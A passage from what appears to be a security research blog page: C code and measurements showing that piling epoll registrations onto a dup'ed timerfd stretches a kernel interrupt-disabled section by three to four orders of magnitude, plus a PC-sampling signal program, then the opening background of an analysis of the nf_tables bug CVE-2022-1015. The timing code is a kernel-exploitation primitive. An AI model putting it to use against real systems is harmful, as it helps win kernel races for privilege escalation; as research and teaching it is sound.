NUM_DUP_FDS 500</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NSEC_PER_SEC 1000000000UL <span class="comment">// 1s = 1000000000ns</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_task_to</span><span class="params">(<span class="keyword">int</span> pid, <span class="keyword">int</span> cpu)</span> </span>{</span><br><span class="line"> <span class="keyword">cpu_set_t</span> cset;</span><br><span class="line"> CPU_ZERO(&cset);</span><br><span class="line"> CPU_SET(cpu, &cset);</span><br><span class="line"> SYSCHK(sched_setaffinity(pid, <span class="keyword">sizeof</span>(<span class="keyword">cpu_set_t</span>), &cset));</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_to</span><span class="params">(<span class="keyword">int</span> cpu)</span> </span>{ pin_task_to(<span class="number">0</span>, cpu); }</span><br><span class="line"></span><br><span class="line"><span class="function">struct timespec <span class="title">get_mono_time</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">timespec</span> <span class="title">ts</span>;</span></span><br><span class="line"> clock_gettime(CLOCK_MONOTONIC, &ts);</span><br><span class="line"> <span class="keyword">return</span> ts;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">ts_add</span><span class="params">(struct timespec *ts, <span 
class="keyword">unsigned</span> <span class="keyword">long</span> nsecs)</span> </span>{</span><br><span class="line"> ts->tv_nsec += nsecs;</span><br><span class="line"> <span class="keyword">if</span> (ts->tv_nsec >= NSEC_PER_SEC) {</span><br><span class="line"> ts->tv_sec++;</span><br><span class="line"> ts->tv_nsec -= NSEC_PER_SEC;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> pin_to(<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">int</span> timerfd = timerfd_create(CLOCK_MONOTONIC, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (timerfd < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"timerfd_create"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// create the epoll instances</span></span><br><span class="line"> <span class="keyword">int</span> epoll_fds[NUM_EPOLL_INSTANCES];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> epoll_fds[i] = epoll_create1(<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (epoll_fds[i] < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_create1"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span 
class="comment">// dup the timerfd: epoll keys registrations by (file, fd), so each dup can be added</span></span><br><span class="line"> <span class="keyword">int</span> timer_fds[NUM_DUP_FDS];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_DUP_FDS; i++) {</span><br><span class="line"> timer_fds[i] = dup(timerfd);</span><br><span class="line"> <span class="keyword">if</span> (timer_fds[i] < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"dup"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// each EPOLL_CTL_ADD puts one entry on the timerfd's wait queue</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">epoll_event</span> <span class="title">ev</span> = {</span> <span class="number">0</span> };</span><br><span class="line"> ev.events = EPOLLIN;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j < NUM_DUP_FDS; j++) {</span><br><span class="line"> ev.data.fd = timer_fds[j];</span><br><span class="line"> <span class="keyword">if</span> (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_ctl"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span 
class="title">timespec</span> <span class="title">base_time</span> = <span class="title">get_mono_time</span>();</span></span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">itimerspec</span> <span class="title">timer_value</span> = {</span> .it_value = base_time };</span><br><span class="line"> ts_add(&timer_value.it_value, <span class="number">1000</span> * <span class="number">1000</span> * <span class="number">1000</span>); <span class="comment">// timer at +1s</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, <span class="literal">NULL</span>) < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"timerfd_settime"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="keyword">int</span> nfds = epoll_wait(epoll_fds[i], &ev, <span class="number">1</span>, <span class="number">-1</span>);</span><br><span class="line"> <span class="keyword">if</span> (nfds < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_wait"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> value;</span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">read</span>(timerfd, &value, <span class="keyword">sizeof</span>(value)) != (<span class="keyword">ssize_t</span>)<span class="keyword">sizeof</span>(value)) err(<span class="number">1</span>, <span class="string">"read"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"value: %lu\n"</span>, value);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="built_in">close</span>(epoll_fds[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_DUP_FDS; i++) {</span><br><span class="line"> <span class="built_in">close</span>(timer_fds[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">close</span>(timerfd);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
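<p><strong>How can the delay be observed?</strong></p>
<p>In GDB, break in <code>timerfd_triggered</code> and walk the timerfd's wait queue: the number of entries matches what the test program registered.</p>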
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">b timerfd_triggered</span><br><span class="line"><span class="comment"># once the breakpoint hits, ctx is the function argument</span></span><br><span class="line"><span class="built_in">set</span> $head = &ctx->wqh.head</span><br><span class="line"><span class="built_in">set</span> $node = $head->next</span><br><span class="line"><span class="built_in">set</span> $n = 0</span><br><span class="line"><span class="keyword">while</span> $node != $head</span><br><span class="line">  <span class="built_in">set</span> $n = $n + 1</span><br><span class="line">  <span class="built_in">set</span> $node = $node->next</span><br><span class="line"><span class="built_in">end</span></span><br><span class="line">p $n</span><br></pre></td></tr></table></figure>
<p>A small patch that reads the TSC with <code>rdtsc</code> before and after the locked section gives a rough measurement of the delay.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0xffffffff81b8b67e</span> <+<span class="number">49</span>>: rdtsc</span><br><span class="line"><span class="number">0xffffffff81b8b680</span> <+<span class="number">51</span>>: shl rdx,<span class="number">0x20</span></span><br><span class="line"><span class="number">0xffffffff81b8b684</span> <+<span class="number">55</span>>: <span class="keyword">or</span> rax,rdx</span><br><span class="line"><span class="number">0xffffffff81b8b687</span> <+<span class="number">58</span>>: lea r12,[rbx+<span class="number">0x88</span>]</span><br><span class="line"><span class="number">0xffffffff81b8b68e</span> <+<span class="number">65</span>>: mov r14,rax</span><br><span class="line"><span class="number">0xffffffff81b8b691</span> <+<span class="number">68</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b694</span> <+<span class="number">71</span>>: call <span class="number">0xffffffff81bde9d0</span> <_raw_spin_lock_irqsave></span><br><span class="line"><span class="number">0xffffffff81b8b699</span> <+<span class="number">76</span>>: inc QWORD PTR [rbx+<span class="number">0xa0</span>]</span><br><span class="line"><span class="number">0xffffffff81b8b6a0</span> <+<span class="number">83</span>>: mov edx,<span class="number">0x1</span></span><br><span 
class="line"><span class="number">0xffffffff81b8b6a5</span> <+<span class="number">88</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b6a8</span> <+<span class="number">91</span>>: mov WORD PTR [rbx+<span class="number">0xac</span>],<span class="number">0x1</span></span><br><span class="line"><span class="number">0xffffffff81b8b6b1</span> <+<span class="number">100</span>>: mov r13,rax</span><br><span class="line"><span class="number">0xffffffff81b8b6b4</span> <+<span class="number">103</span>>: mov esi,<span class="number">0x3</span></span><br><span class="line"><span class="number">0xffffffff81b8b6b9</span> <+<span class="number">108</span>>: call <span class="number">0xffffffff810ad650</span> <__wake_up_locked_key></span><br><span class="line"><span class="number">0xffffffff81b8b6be</span> <+<span class="number">113</span>>: mov rsi,r13</span><br><span class="line"><span class="number">0xffffffff81b8b6c1</span> <+<span class="number">116</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b6c4</span> <+<span class="number">119</span>>: call <span class="number">0xffffffff81bde5b0</span> <_raw_spin_unlock_irqrestore></span><br><span class="line"><span class="number">0xffffffff81b8b6c9</span> <+<span class="number">124</span>>: rdtsc</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/fs/timerfd.c b/fs/timerfd.c</span><br><span class="line">index e9c96a0c79f1..b919b24b4d48 <span class="number">100644</span></span><br><span class="line">--- a/fs/timerfd.c</span><br><span class="line">+++ b/fs/timerfd.c</span><br><span class="line">@@ <span class="number">-64</span>,<span class="number">11</span> +<span class="number">64</span>,<span class="number">20</span> @@ <span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">timerfd_triggered</span><span class="params">(struct timerfd_ctx *ctx)</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;</span><br><span class="line"></span><br><span class="line">+ u64 start_time, end_time;</span><br><span class="line">+</span><br><span class="line">+ pr_warn(<span class="string">"[%s] %s enter\n"</span>, current->comm, __func__);</span><br><span class="line">+</span><br><span class="line">+ <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span 
class="params">(<span class="string">"rdtsc; shlq $32, %%rdx; orq %%rdx, %0"</span></span></span></span><br><span class="line"><span class="function"><span class="params">+ : <span class="string">"=a"</span>(start_time) :: <span class="string">"%rdx"</span>)</span></span>;</span><br><span class="line"> spin_lock_irqsave(&ctx->wqh.lock, flags);</span><br><span class="line"> ctx->expired = <span class="number">1</span>;</span><br><span class="line"> ctx->ticks++;</span><br><span class="line"> wake_up_locked_poll(&ctx->wqh, EPOLLIN);</span><br><span class="line"> spin_unlock_irqrestore(&ctx->wqh.lock, flags);</span><br><span class="line">+ <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(<span class="string">"rdtsc; shlq $32, %%rdx; orq %%rdx, %0"</span></span></span></span><br><span class="line"><span class="function"><span class="params">+ : <span class="string">"=a"</span>(end_time) :: <span class="string">"%rdx"</span>)</span></span>;</span><br><span class="line">+ pr_warn(<span class="string">"[%s] %s exit, %lld\n"</span>, current->comm, __func__, end_time - start_time);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
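<p>During normal operation the rdtsc delta measured around timerfd_triggered is roughly 3000 ~ 30000 ticks. Creating 500 * 500 entries increases the CPU time spent in the function by 3 to 4 orders of magnitude (the test VM has a single-core 2000 MHz CPU).</p>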
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">2976</span></span><br><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">3970</span></span><br><span class="line">[ <span class="number">1134.552271</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1134.552906</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">11616</span></span><br><span class="line">[ <span class="number">1175.552958</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1175.553871</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span 
class="number">32663</span></span><br><span class="line">[ <span class="number">1176.052796</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1176.053719</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">29340</span></span><br><span class="line">[ <span class="number">1184.738834</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1184.739757</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">27116541</span> <span class="comment">// 500 * 500</span></span><br><span class="line">...</span><br><span class="line">[ <span class="number">1588.076916</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1588.077841</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">28924883</span> <span class="comment">// 500 * 500</span></span><br><span class="line">...</span><br><span class="line">[ <span class="number">1596.735608</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1596.736503</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">28029898</span> <span class="comment">// 500 * 500</span></span><br><span class="line">...</span><br><span class="line">[ <span class="number">1222.384483</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1222.385381</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">8511668</span> <span class="comment">// 100 * 500</span></span><br><span class="line">...</span><br><span class="line">[ <span class="number">1265.026284</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1265.027208</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">1202548</span> <span class="comment">// 10 * 500</span></span><br></pre></td></tr></table></figure>
<h3 id="一种观测代码被中断位置的方法"><a href="#一种观测代码被中断位置的方法" class="headerlink" title="A way to observe where code gets interrupted"></a>A way to observe where code gets interrupted</h3><p>From the appendix of the original article:</p>
<blockquote>
<p>I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register</p>
</blockquote>
<p>Implementation:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><signal.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ucontext.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/time.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/user.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><time.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sched.h></span></span></span><br><span class="line"><span 
class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><err.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SYSCHK(x) ({ \</span></span><br><span class="line"> typeof(x) __res = (x); \</span><br><span class="line"> <span class="keyword">if</span> (__res == (typeof(x))<span class="number">-1</span>) \</span><br><span class="line"> err(<span class="number">1</span>, <span class="string">"SYSCHK("</span> #x <span class="string">")"</span>); \</span><br><span class="line"> __res; \</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_task_to</span><span class="params">(<span class="keyword">int</span> pid, <span class="keyword">int</span> cpu)</span> </span>{</span><br><span class="line"> <span class="keyword">cpu_set_t</span> cset;</span><br><span class="line"> CPU_ZERO(&cset);</span><br><span class="line"> CPU_SET(cpu, &cset);</span><br><span class="line"> SYSCHK(sched_setaffinity(pid, <span class="keyword">sizeof</span>(<span class="keyword">cpu_set_t</span>), &cset));</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_to</span><span class="params">(<span class="keyword">int</span> cpu)</span> </span>{ pin_task_to(<span class="number">0</span>, cpu); }</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">timer_handler</span><span class="params">(<span class="keyword">int</span> signum, <span class="keyword">siginfo_t</span> *info, <span class="keyword">void</span> *context)</span> </span>{</span><br><span class="line"> <span class="keyword">ucontext_t</span> *ucontext = (<span class="keyword">ucontext_t</span> *) context;</span><br><span class="line"> <span 
class="keyword">void</span> *pc = (<span class="keyword">void</span> *) ucontext->uc_mcontext.gregs[REG_RIP];</span><br><span class="line"> <span class="keyword">long</span> rax = ucontext->uc_mcontext.gregs[REG_RAX];</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Timer fired, PC = %p, rax: %ld\n"</span>, pc, rax);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>{</span><br><span class="line"> pin_to(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Set up the signal handler for SIGALRM</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sigaction</span> <span class="title">sa</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&sa, <span class="number">0</span>, <span class="keyword">sizeof</span>(sa));</span><br><span class="line"> sa.sa_flags = SA_SIGINFO;</span><br><span class="line"> sa.sa_sigaction = timer_handler;</span><br><span class="line"> sigaction(SIGALRM, &sa, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Start the timer</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">itimerspec</span> <span class="title">its</span>;</span></span><br><span class="line"> its.it_interval.tv_sec = <span class="number">0</span>;</span><br><span class="line"> its.it_interval.tv_nsec = <span class="number">10000000</span>; <span class="comment">// 100Hz</span></span><br><span class="line"> its.it_value = its.it_interval;</span><br><span class="line"> <span class="keyword">timer_t</span> timerid;</span><br><span class="line"> timer_create(CLOCK_MONOTONIC, <span 
class="literal">NULL</span>, &timerid);</span><br><span class="line"> timer_settime(timerid, <span class="number">0</span>, &its, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Run a loop to generate some activity</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> i;</span><br><span class="line"> <span class="keyword">while</span> (<span class="number">1</span>) {</span><br><span class="line"> <span class="function">__asm__ <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $1, %%rax\n\t"</span> <span class="comment">// Move 1 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $2, %%rax\n\t"</span> <span class="comment">// Move 2 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $3, %%rax\n\t"</span> <span class="comment">// Move 3 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $4, %%rax\n\t"</span> <span class="comment">// Move 4 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $5, %%rax\n\t"</span> <span class="comment">// Move 5 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $6, %%rax\n\t"</span> <span class="comment">// Move 6 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $7, %%rax\n\t"</span> <span class="comment">// Move 7 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span 
class="string">"mov $8, %%rax\n\t"</span> <span class="comment">// Move 8 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $9, %%rax\n\t"</span> <span class="comment">// Move 9 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="string">"mov $10, %%rax\n\t"</span> <span class="comment">// Move 10 to rax</span></span></span></span><br><span class="line"><span class="function"><span class="params"></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="comment">// No output operand</span></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="comment">// No input operand</span></span></span></span><br><span class="line"><span class="function"><span class="params"> : <span class="string">"%rax"</span> <span class="comment">// Clobbered register</span></span></span></span><br><span class="line"><span class="function"><span class="params"> )</span></span>;</span><br><span class="line"> <span class="comment">//i = -1; /* memory write */</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</div>
<footer class="article-footer">
</footer>
</div>
</article>
<article id="post-2023/02/06/cve-2022-1015" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/02/06/cve-2022-1015/" class="article-date">
<time datetime="2023-02-06T14:00:00.000Z" itemprop="datePublished">2023-02-06</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/02/06/cve-2022-1015/">Analysis of CVE-2022-1015, a privilege escalation vulnerability in nf_tables</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>author: 莫兴远 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
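<h1 id="一、简介"><a href="#一、简介" class="headerlink" title="1. Introduction"></a>1. Introduction</h1><p>CVE-2022-1015 is a vulnerability in the nf_tables module of the Linux kernel. It is caused by an integer range that is not properly restricted, which leads to out-of-bounds reads and writes on the stack.</p>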
<p>Affected kernel versions: 5.12 to 5.16.</p>
<p>The vulnerability was fixed by this <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851" target="_blank" rel="noopener">commit</a>.</p>
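<h1 id="二、漏洞相关知识"><a href="#二、漏洞相关知识" class="headerlink" title="2. Background"></a>2. Background</h1><p>Netfilter is a very large subsystem of the Linux kernel. It places multiple hooks in the kernel's network stack and lets other modules register callback functions at those hooks; whenever the kernel reaches a hook, every callback registered there is executed.</p>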
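<p>nf_tables is a module of the Netfilter subsystem. It registers callbacks at some of Netfilter's hooks to provide packet filtering, and is typically used to implement firewalls. The vulnerability analyzed in this article lives in the nf_tables module.</p>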
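<p>User space talks to nf_tables through netlink. netlink is a common mechanism for communication between user space and the kernel: user space passes information to the kernel by sending data on a socket of type AF_NETLINK, and likewise obtains the kernel's replies by receiving data from such a socket.</p>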
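<h2 id="2-1-nf-tables实现"><a href="#2-1-nf-tables实现" class="headerlink" title="2.1 nf_tables Implementation"></a>2.1 nf_tables Implementation</h2><p>nf_tables lets users register rules for processing network packets, which decide what action to take for each kind of packet. Multiple rules are organized into a chain, and multiple chains are organized into a table. Different types of chains are bound to different Netfilter hooks. When a packet arrives and passes through the kernel's hooks, every chain bound to a given hook is executed to process the packet. Executing a chain means executing all of its rules in order, and executing a rule means applying its criteria to the packet to decide what to do with it: drop, reject, or accept.</p>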
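<p>Rules are registered with nf_tables through netlink. Because the messages sent to the kernel over netlink are very low level and inconvenient to write by hand, the developers provide the user-space tool nft, which lets users express rules in a higher-level syntax.</p>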
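<h3 id="2-1-1-rule"><a href="#2-1-1-rule" class="headerlink" title="2.1.1 rule"></a>2.1.1 rule</h3><p>A rule contains the logic for handling packets, such as checking a packet's protocol, source address, destination address, or port, so that different actions can be taken. Each rule is bound to a verdict, i.e. a default decision about what to do with the packet: drop, reject, or accept. For example:</p>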
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">udp dport 50001 drop</span><br></pre></td></tr></table></figure>
<p>drop is the verdict of this rule: every UDP packet whose destination port is 50001 is dropped.</p>
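<h3 id="2-1-2-chain"><a href="#2-1-2-chain" class="headerlink" title="2.1.2 chain"></a>2.1.2 chain</h3><p>A chain organizes rules; one chain can contain many rules. Chains are either base chains or non-base chains. A base chain is attached directly to a Netfilter hook, and execution always starts from a base chain. The rules of a chain are normally executed in order until the end, but a rule's verdict can make execution jump to another chain, skipping the remaining rules of the current chain; the target must be a non-base chain. There are two kinds of jumps: with one (goto), execution never comes back; with the other (jump), execution can return and continue with the remaining rules of the original chain.</p>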
